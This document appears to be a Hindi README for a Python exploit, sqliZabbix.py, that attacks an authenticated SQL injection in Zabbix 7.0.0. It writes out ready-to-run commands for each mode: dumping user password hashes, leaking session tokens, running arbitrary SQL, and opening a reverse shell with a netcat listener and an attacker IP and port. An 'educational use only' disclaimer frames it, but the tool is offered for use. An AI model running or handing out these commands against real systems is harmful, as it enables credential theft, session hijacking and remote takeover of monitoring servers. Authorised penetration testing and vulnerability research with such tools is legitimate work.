
यह केवल शैक्षिक उद्देश्यों के लिए है। कृपया अनधिकृत सिस्टम के विरुद्ध उपयोग न करें।
एक Python स्क्रिप्ट जो Zabbix 7.0.0 की प्रमाणित SQL इंजेक्शन कमजोरी का शोषण करती है, जो उपयोगकर्ता डेटा निष्कर्षण, सत्र टोकन लीक, रिमोट कमांड निष्पादन (RCE), और कस्टम क्वेरी इंजेक्शन सहित कई कार्रवाई मोड का समर्थन करती है।
⚠️ अस्वीकरण:
यह स्क्रिप्ट केवल शैक्षिक और अधिकृत प्रवेश परीक्षण उद्देश्यों के लिए है।
उन सिस्टम पर उपयोग न करें जिनके आप मालिक नहीं हैं या जिनके परीक्षण करने की स्पष्ट अनुमति नहीं है।
लेखक इस उपकरण द्वारा किए गए किसी भी दुरुपयोग या क्षति के लिए जिम्मेदार नहीं है।
requests लाइब्रेरीयदि आवश्यक हो तो आवश्यकताएं स्थापित करें:
pip install requests
python3 sqliZabbix.py -u <ZABBIX_URL> -U <USERNAME> -p <PASSWORD> --mode <MODE> [optional args...]
| मोड | विवरण | एडमिन टोकन आवश्यक |
|---|---|---|
| leak-users | सभी उपयोगकर्ता आईडी, उपयोगकर्तानाम, पासवर्ड हैश और भूमिकाओं को डंप करता है | ❌ |
| leak-tokens | डेटाबेस से सभी सक्रिय सत्र आईडी डंप करता है | ❌ |
| rce | item.create एक्सप्लॉइट के माध्यम से रिवर्स शेल स्पॉन करता है | ✅ |
| custom | इंजेक्शन के माध्यम से कोई भी कस्टम SQL क्वेरी चलाएं | ❌ |
उपयोगकर्ता हैश डंप करें
python3 sqliZabbix.py -u http://target/zabbix/ -U guest -p guest --mode leak-users
सत्र टोकन लीक करें
python3 sqliZabbix.py -u http://target/zabbix/ -U guest -p guest --mode leak-tokens
रिमोट कोड निष्पादन (रिवर्स शेल)
# पहले एक लिसनर शुरू करें:
nc -lvnp 9001
# फिर चलाएं:
python3 sqliZabbix.py -u http://target/zabbix/ -U guest -p guest --admin_token <ADMIN_API_TOKEN> --ip <YOUR_IP> --port 9001 --mode rce
कस्टम SQL इंजेक्शन
python3 sqliZabbix.py -u http://target/zabbix/ -U guest -p guest --mode custom --query "SELECT version()"
sqliZabbix.py # मुख्य एक्सप्लॉइट स्क्रिप्ट
README.md # यह दस्तावेज़
Anthony (@874anthony)
प्यार और जिज्ञासा से बनाई गई 🐍
यह परियोजना MIT लाइसेंस के तहत जारी की गई है। कृपया जिम्मेदारी से उपयोग करें।